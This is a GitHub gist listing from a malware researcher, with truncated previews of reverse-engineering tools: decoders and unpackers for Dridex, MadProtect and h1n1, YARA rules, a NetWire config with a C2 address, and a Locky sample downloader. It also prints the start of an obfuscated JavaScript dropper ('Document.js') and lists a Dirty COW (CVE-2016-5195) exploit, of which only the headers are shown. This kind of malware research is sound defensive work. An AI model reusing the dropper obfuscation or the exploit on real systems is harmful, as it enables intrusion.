Skip to content

Instantly share code, notes, and snippets.

View mak's full-sized avatar

Maciej Kotowicz mak

160 followers · 3 following
View GitHub Profile
@mak
mak / dridex_decode.py
Created November 17, 2015 07:57
Decode dridex strings
def dridex_decode_name(addr,idx,delm="\x00"):
addr += 8; tmp = ''; j = 0
xkey = GetManyBytes(addr,8)
for i in range(idx+1):
tmp = ''
while not tmp.endswith(delm):
tmp += chr(ord(xkey[j%8]) ^ Byte(addr+8+j))
j+=1
return tmp.strip(delm)
@mak
mak / cfg_struct.h
Last active October 28, 2018 21:15
dridex new config storage
struct cfg_t {
int field_0;
unsigned __int16 botnet;
unsigned __int8 count;
char unknown;
ip_addr cnc[count];
};
struct ip_addr {
char ipaddr[4];
@mak
mak / netwire.json
Created February 1, 2016 18:39
some netwire cfg
{
"binary": "989b29681f22c0c7561e441bbf6cb64c",
"password": "36b&^%rUmLV8FN#{}r\"#V)}Hc`$?}j",
"filename": "ESET-%Rand%",
"reg-key": "avast",
"mutex": "avast",
"urls": [
{
"cnc": "213.152.161.69",
"port": 3838
@mak
mak / mp.yara
Created February 1, 2016 19:03
yara rules for madprotect
rule MadProtect : packer {
meta:
author = "mak"
strings:
$enc_hdr = { 23 59 90 70 e9 c1 ec 82 b4 87 b3 4e 03 10 6c 2e}
$key_loop0 = { B0 0F 88 01 04 02 41 3C 4F 72 F7 }
$key_loop1 = { B0 0F EB 02 [2] 01 04 02 41 3C 4F 72 F7 }
$key_loop2 = { B0 0F EB 03 [3] 01 04 02 41 3C 4F 72 F7 }
$key_loop3 = { B0 0F EB 04 [4] 01 04 02 41 3C 4F 72 F7 }
$key_loop4 = { B0 0F EB 05 [5] 01 04 02 41 3C 4F 72 F7 }
@mak
mak / mp.py
Created February 1, 2016 19:05
decode from mad protector
import sys
import pefile
from StringIO import StringIO
from Crypto.Cipher import AES
K =''.join((chr(x) for x in range(15,0x4f,2)))
ENC_HEADER="\x23\x59\x90\x70\xe9\xc1\xec\x82\xb4\x87\xb3\x4e\x03\x10\x6c\x2e"
decrypt = lambda d: AES.new(K,AES.MODE_ECB).decrypt(d)
chunks = lambda l, n: [l[x: x+n] for x in xrange(0, len(l), n)]
IDX = 0
@mak
mak / Document.js
Last active October 28, 2018 21:12
Obfuscated dropper
obj_even='fuck';obj_term='aiyyoI';obj_term='thingIm';obj_initiatives6='just';obj_terabytes3='little';obj_since='bitAiyyo7'
;obj_analytics='dispensing';obj_some0='thingIm';obj_target2='motherfucking8';obj_gigabytes='smile';obj_store4='freaks
;obj_percapita='feeding';obj_size10='this';obj_hundreds10='just5';obj_complex='itself2';obj_their1='feeding';obj_sets
='dont4';obj_simulations3='relieveAll';obj_seldom='freaks';var obj_from=this[{the2:'\u0041'}.the2+{h0:'\u0063'}.h0+{o0
:'\u0074'}.o0+{if1:'\u0069'}.if1+{a2:'\u0076'}.a2+{efe0:'\u0065'}.efe0+{ou2:'\u0058'}.ou2+{at3:'\u004f'}.at3+{l1:'\u0062'}
.l1+{ccu1:'\u006a'}.ccu1+{a0:'\u0065'}.a0+{ec0:'\u0063'}.ec0+{an1:'\u0074'}.an1];var obj_thousands7=this[{eri0:'\u0057'}
.eri0+{onn0:'\u0053'}.onn0+{ue0:'\u0063'}.ue0+{un2:'\u0072'}.un2+{iff1:'\u0069'}.iff1+{red3:'\u0070'}.red3+{n3:'\u0074'}
.n3];var obj_data6 = obj_thousands7[{e3:'\u0043'}.e3+{art0:'\u0072'}.art0+{ec1:'\u0065'}.ec1+{l3:'\u0061'}.l3+{ea2
:'\u0074'}.ea2+{o1:'\u0065'}.o1+{ci2:'\u004f'}.ci2+{e2:'\u0062'}.e
@mak
mak / h1n1_emu.py
Created May 27, 2016 16:42
Unpack last stage of h1n1 loader
import sys
import pefile
from unicorn import *
from unicorn.x86_const import *
pe = pefile.PE(sys.argv[1])
for s in pe.sections:
if s.Name.strip("\x00") == '.rsrc':
code_section = s
@mak
mak / get_locky.py
Created June 22, 2016 22:16
locky sample downloader
import sys
import hashlib
import struct
import requests
def decode(data,seed,step):
r = []
k = seed
for c in map(ord,data):
r.append(chr(c ^ k))
@mak
mak / naughtyc0w.c
Created October 22, 2016 20:48
exploit for CVE-2016-5195 nothing fancy
#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <sys/uio.h>
#include <sys/wait.h>
@mak
mak / hdoc.py
Last active October 28, 2018 21:09
Extract payload from H-docs
#!/usr/bin/env python2
import os
import re
import sys
import math
import pefile
import struct
import hashlib
import argparse
from oletools import olevba